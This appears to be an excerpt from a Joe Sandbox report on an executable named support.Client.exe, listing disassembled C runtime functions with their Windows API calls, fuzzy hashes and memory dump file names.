Instruction ID: c5a64a7693d7ad5f83fa5659433bde89a49ef20a7b034a424a750aeb4167a324
Opcode Fuzzy Hash: a9ee2a87e0f7f5cb6665dff8015599bb15083ab8797c731aa1c9d1c3efc9e71c
Instruction Fuzzy Hash: A051D172A24216AFDB298F64CD81EAF77AAEB44750B15462AFC06D6240FB34DD40C6A0

Function 00AD8417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AD8B8C,?,00000000,?,00000000,00000000), ref: 00AD8459
__fassign.LIBCMT ref: 00AD84D4
__fassign.LIBCMT ref: 00AD84EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AD8515
WriteFile.KERNEL32(?,?,00000000,00AD8B8C,00000000,?,?,?,?,?,?,?,?,?,00AD8B8C,?), ref: 00AD8534
WriteFile.KERNEL32(?,?,00000001,00AD8B8C,00000000,?,?,?,?,?,?,?,?,?,00AD8B8C,?), ref: 00AD856D

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c44c807e954d7cab939e1b453b0a6d3e34d02142b80a9610f03902fb0caf3052
Instruction ID: e4878d30d3c8fb3032fb30c591bfcb822ee8e77d86d7f10ea9f392b64b260a06
Opcode Fuzzy Hash: c44c807e954d7cab939e1b453b0a6d3e34d02142b80a9610f03902fb0caf3052
Instruction Fuzzy Hash: 795173B19002499FDB10CFA8D885BEEBBF5EF19300F14415BE556E7391DB34A941CBA0

Function 00AD1E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00AD1E37
___except_validate_context_record.LIBVCRUNTIME ref: 00AD1E3F
_ValidateLocalCookies.LIBCMT ref: 00AD1EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00AD1EF3
_ValidateLocalCookies.LIBCMT ref: 00AD1F48

Strings

csm, xrefs: 00AD1EDD

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 50c40940a7f2202d67f3e75184276d9a63214815069d08ef8656488fe67a46fd
Instruction ID: ccf1d97b102d4d73c4466463c80c7d5810a7832473b472ed29e930cf5466e176
Opcode Fuzzy Hash: 50c40940a7f2202d67f3e75184276d9a63214815069d08ef8656488fe67a46fd
Instruction Fuzzy Hash: 1141C434A00218ABCF10DF68C885AAEBBB5BF45354F148557EC169B392DB319A41CB91

Function 00AD621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AD61DF: _free.LIBCMT ref: 00AD6208

_free.LIBCMT ref: 00AD6269

Part of subcall function 00AD4869: HeapFree.KERNEL32(00000000,00000000,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?), ref: 00AD487F
Part of subcall function 00AD4869: GetLastError.KERNEL32(?,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?,?), ref: 00AD4891

_free.LIBCMT ref: 00AD6274
_free.LIBCMT ref: 00AD627F
_free.LIBCMT ref: 00AD62D3
_free.LIBCMT ref: 00AD62DE
_free.LIBCMT ref: 00AD62E9
_free.LIBCMT ref: 00AD62F4

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: f65825ae20211c2e6a2a1913f6af157e24e1805ad7921ba8829bbf7ee51bfbf3
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: 66116371540B14BFE520B7B1CD07FCB779C5F44B40F404926B6ABA7293EA75BA045B50

Function 00AD3D8F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00AD3DAD

Part of subcall function 00AD4869: HeapFree.KERNEL32(00000000,00000000,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?), ref: 00AD487F
Part of subcall function 00AD4869: GetLastError.KERNEL32(?,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?,?), ref: 00AD4891

_free.LIBCMT ref: 00AD3DBF
_free.LIBCMT ref: 00AD3DD2
_free.LIBCMT ref: 00AD3DE3
_free.LIBCMT ref: 00AD3DF4

Strings

G, xrefs: 00AD3D8F, 00AD3D9E, 00AD3DB3

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: G
API String ID: 776569668-1964200518
Opcode ID: 27525b305f8bd3a23fed70694b2eaae3f98e591e2180f2811b6cf513e04a34b8
Instruction ID: 34c1d01d02dfe8c957f9b5ecdc58641d59987b31bdc99538aadcedb599d171ff
Opcode Fuzzy Hash: 27525b305f8bd3a23fed70694b2eaae3f98e591e2180f2811b6cf513e04a34b8
Instruction Fuzzy Hash: 71F017B98002F08BEB81EF95FDC19093B64AB48760340021BF4229E3B1CB350A829BD1

Function 00AD23D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00AD23C8,00AD209F,00AD1AFC), ref: 00AD23DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AD23ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD2406
SetLastError.KERNEL32(00000000,00AD23C8,00AD209F,00AD1AFC), ref: 00AD2458

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 79553b65be09ee93ec31ec7f4894222057e9659d1cd4011bb32dc875f5bc888d
Instruction ID: e5a94995327d7338e37f59d3978d4cfc622e3c191c84d2dfb8cd85ecb0197b7f
Opcode Fuzzy Hash: 79553b65be09ee93ec31ec7f4894222057e9659d1cd4011bb32dc875f5bc888d
Instruction Fuzzy Hash: F401D4721493659EAA2467F8AC8576B3754DB217B4B20023BF923897E4EF618C82D350

Function 00AD4424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,00AD6D69,?,?,?,00AE04C8,0000002C,00AD3F34,00000016,00AD209F,00AD1AFC), ref: 00AD4428
_free.LIBCMT ref: 00AD445B
_free.LIBCMT ref: 00AD4483
SetLastError.KERNEL32(00000000), ref: 00AD4490
SetLastError.KERNEL32(00000000), ref: 00AD449C
_abort.LIBCMT ref: 00AD44A2

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 8817b193a6ae3d19662cfd58b799df5abc98c3174c17c0a6f2334c6b4c43cafe
Instruction ID: c013312d741503dc873f02072f3d6346276624a544159e4d47d47122f970a306
Opcode Fuzzy Hash: 8817b193a6ae3d19662cfd58b799df5abc98c3174c17c0a6f2334c6b4c43cafe
Instruction Fuzzy Hash: 80F0F476500680A7C612B774AC19B6F376AAFC97B1B25811BF52BD63D1EF308D425220

Function 00AD2F53 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\support.Client.exe,00000104), ref: 00AD2F93
_free.LIBCMT ref: 00AD305E
_free.LIBCMT ref: 00AD3068

Strings

x%, xrefs: 00AD2F99
C:\Users\user\Desktop\support.Client.exe, xrefs: 00AD2F8A, 00AD2F91, 00AD2FC0, 00AD2FF8

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\support.Client.exe$x%
API String ID: 2506810119-3460839147
Opcode ID: d0f7f2f79ca56b48e2fff8b00a66239c7516958a6a2be7a09c1f5c7827aac433
Instruction ID: 97732769637a729ebba039b29625176caab4c86e65b06b5c0c0d34066e278861
Opcode Fuzzy Hash: d0f7f2f79ca56b48e2fff8b00a66239c7516958a6a2be7a09c1f5c7827aac433
Instruction Fuzzy Hash: 71316E72A00258AFDB21DB99DDC59AEBBBCEF89710F104067F4069B311D6718F41CB92

Function 00AD36FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AD36AD,?,?,00AD364D,?,00AE02E0,0000000C,00AD37A4,?,00000002), ref: 00AD371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AD372F
FreeLibrary.KERNEL32(00000000,?,?,?,00AD36AD,?,?,00AD364D,?,00AE02E0,0000000C,00AD37A4,?,00000002,00000000), ref: 00AD3752

Strings

CorExitProcess, xrefs: 00AD3727
mscoree.dll, xrefs: 00AD3715

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 04da5e6ac401c3deb270730f8e56c0e051c87fcb8c5ae164419b2daef8491ef2
Instruction ID: 7f8efbf93974187653411d3dc6fc5aa1bab34c659e00598ab7fb53006491d104
Opcode Fuzzy Hash: 04da5e6ac401c3deb270730f8e56c0e051c87fcb8c5ae164419b2daef8491ef2
Instruction Fuzzy Hash: BEF04F71A11218FBCB11DB90DC49BAEBFB5EF08B52F01406AF807A6290DB315A45CBA1

Function 00AD634D Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00AD54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00AD639A
__alloca_probe_16.LIBCMT ref: 00AD63D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AD6423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AD6435
__freea.LIBCMT ref: 00AD643E

Part of subcall function 00AD62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AD7E5B,?,00000000,?,00AD686F,?,00000004,00000000,?,?,?,00AD3BCD), ref: 00AD6331

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: e4989deccbb3d2ef011808d03a4e7a69e09c33f0d018aafc9850dd92c9a66739
Instruction ID: 9a466b7a60a65942a02af902d5490934b24a872084431801e20d5b87ad5c9093
Opcode Fuzzy Hash: e4989deccbb3d2ef011808d03a4e7a69e09c33f0d018aafc9850dd92c9a66739
Instruction Fuzzy Hash: 3F31E1B2A1021AABDF25DFA4DC85EAE7BB5EF00310F05412AFC16DA250E735CD55CBA0

Function 00AD561E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00AD5627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AD564A

Part of subcall function 00AD62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AD7E5B,?,00000000,?,00AD686F,?,00000004,00000000,?,?,?,00AD3BCD), ref: 00AD6331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AD5670
_free.LIBCMT ref: 00AD5683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AD5692

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 7fb67c4f7e6b69105435a7b2bb15ce5329139a184c0610497b9acf36cb8e7442
Instruction ID: 5021562b3ec995757b5413ed9893f190bd669a52411badcd69abb5b449c2c291
Opcode Fuzzy Hash: 7fb67c4f7e6b69105435a7b2bb15ce5329139a184c0610497b9acf36cb8e7442
Instruction Fuzzy Hash: 22017572A12A557F27255BB65C48CBB7E7DDEC6BA135A012BF916C3340EB60CC0195B0

Function 00AD44A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00AD47FE,00AD7E79,?,00AD686F,?,00000004,00000000,?,?,?,00AD3BCD,?,00000000), ref: 00AD44AD
_free.LIBCMT ref: 00AD44E2
_free.LIBCMT ref: 00AD4509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00AD4516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00AD451F

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 11f6309774623101c377a0f33e5bd2c1a276ea21def7f024f4505cfa10b3c4b5
Instruction ID: b54f8afe8b698b2869124a01d1ffc4114852959e2f2aa0fdad5129fc3887644c
Opcode Fuzzy Hash: 11f6309774623101c377a0f33e5bd2c1a276ea21def7f024f4505cfa10b3c4b5
Instruction Fuzzy Hash: 2A01F976201640A79212B7757D85E2F376DABCD3B17214127F42BD2382FF308D025120

Function 00AD6176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD618E

Part of subcall function 00AD4869: HeapFree.KERNEL32(00000000,00000000,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?), ref: 00AD487F
Part of subcall function 00AD4869: GetLastError.KERNEL32(?,?,00AD620D,?,00000000,?,00000000,?,00AD6234,?,00000007,?,?,00AD669F,?,?), ref: 00AD4891

_free.LIBCMT ref: 00AD61A0
_free.LIBCMT ref: 00AD61B2
_free.LIBCMT ref: 00AD61C4
_free.LIBCMT ref: 00AD61D6

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d41418d9e534ee9197668213a0aee2d600cdd3166ac575d80b17ff0a1219945
Instruction ID: 8b8af15a65fd4e3ff8cbf4017e023a52b751b92d596396ab0e04c18296eae704
Opcode Fuzzy Hash: 7d41418d9e534ee9197668213a0aee2d600cdd3166ac575d80b17ff0a1219945
Instruction Fuzzy Hash: 15F096326042A0AF9660EF99FAC1C1E77EDAA44B50B580807F41FDB752C734FC818B50

Function 00AD512A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00AD4424: GetLastError.KERNEL32(00000008,?,00AD6D69,?,?,?,00AE04C8,0000002C,00AD3F34,00000016,00AD209F,00AD1AFC), ref: 00AD4428
Part of subcall function 00AD4424: _free.LIBCMT ref: 00AD445B
Part of subcall function 00AD4424: SetLastError.KERNEL32(00000000), ref: 00AD449C
Part of subcall function 00AD4424: _abort.LIBCMT ref: 00AD44A2

Part of subcall function 00AD5249: _abort.LIBCMT ref: 00AD527B
Part of subcall function 00AD5249: _free.LIBCMT ref: 00AD52AF

Part of subcall function 00AD4EBE: GetOEMCP.KERNEL32(00000000,?,?,00AD5147,?), ref: 00AD4EE9

_free.LIBCMT ref: 00AD51A2
_free.LIBCMT ref: 00AD51D8

Strings

G, xrefs: 00AD521C
G, xrefs: 00AD5221

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: G$ G
API String ID: 2991157371-361391304
Opcode ID: fcd19b69ff6b515793cf15aa6512a7a67524cef11a21c6cb7bc0e4faf3f8d921
Instruction ID: 06fbb67695e84e4eefe5eec19944e2895e181f81cd13e39bf8fa965d1420d55a
Opcode Fuzzy Hash: fcd19b69ff6b515793cf15aa6512a7a67524cef11a21c6cb7bc0e4faf3f8d921
Instruction Fuzzy Hash: 4631B131E04648AFDB11EBA9D980B9DB7F5EF45320F25029BF8069B391EB319E41CB50

Function 00AD25E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AD2594,00000000,?,00AE1B50,?,?,?,00AD2737,00000004,InitializeCriticalSectionEx,00ADBC48,InitializeCriticalSectionEx), ref: 00AD25F0
GetLastError.KERNEL32(?,00AD2594,00000000,?,00AE1B50,?,?,?,00AD2737,00000004,InitializeCriticalSectionEx,00ADBC48,InitializeCriticalSectionEx,00000000,?,00AD24C7), ref: 00AD25FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AD2622

Strings

api-ms-, xrefs: 00AD2607

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 7c96c8b986d660e5592f130fdf77c8fe01a388c6ce9f2d6e4df2840a920449ed
Instruction ID: 8eba8c3ced526e778628b60274319aa6459d2019059e26fecff49ba6ab96a6bf
Opcode Fuzzy Hash: 7c96c8b986d660e5592f130fdf77c8fe01a388c6ce9f2d6e4df2840a920449ed
Instruction Fuzzy Hash: DCE01230650304FBDF111BA0EC06B597B54FF14B52F114422F90FA41A1EBA1D9559664

Function 00AD57DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00AD5784,00000000,00000000,00000000,00000000,?,00AD5981,00000006,FlsSetValue), ref: 00AD580F
GetLastError.KERNEL32(?,00AD5784,00000000,00000000,00000000,00000000,?,00AD5981,00000006,FlsSetValue,00ADC4D8,FlsSetValue,00000000,00000364,?,00AD44F6), ref: 00AD581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AD5784,00000000,00000000,00000000,00000000,?,00AD5981,00000006,FlsSetValue,00ADC4D8,FlsSetValue,00000000), ref: 00AD5829

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 81e33f010ed9740a9ae4a4ed274f57b9d010c2f04074e04f988f73a23117c0a2
Instruction ID: ee997e365a415e1c18d16f51e6a1bc892331bab18dba076fe23d11e1e324facd
Opcode Fuzzy Hash: 81e33f010ed9740a9ae4a4ed274f57b9d010c2f04074e04f988f73a23117c0a2
Instruction Fuzzy Hash: 3F01AC32A16622EBC7218FF8DC44A5B7798AF057A17210526F917D7340DB20D901E7F0

Function 00AD5249 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AD4424: GetLastError.KERNEL32(00000008,?,00AD6D69,?,?,?,00AE04C8,0000002C,00AD3F34,00000016,00AD209F,00AD1AFC), ref: 00AD4428
Part of subcall function 00AD4424: _free.LIBCMT ref: 00AD445B
Part of subcall function 00AD4424: SetLastError.KERNEL32(00000000), ref: 00AD449C
Part of subcall function 00AD4424: _abort.LIBCMT ref: 00AD44A2

_abort.LIBCMT ref: 00AD527B
_free.LIBCMT ref: 00AD52AF

Strings

G, xrefs: 00AD52B5, 00AD52BD

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: G
API String ID: 289325740-1964200518
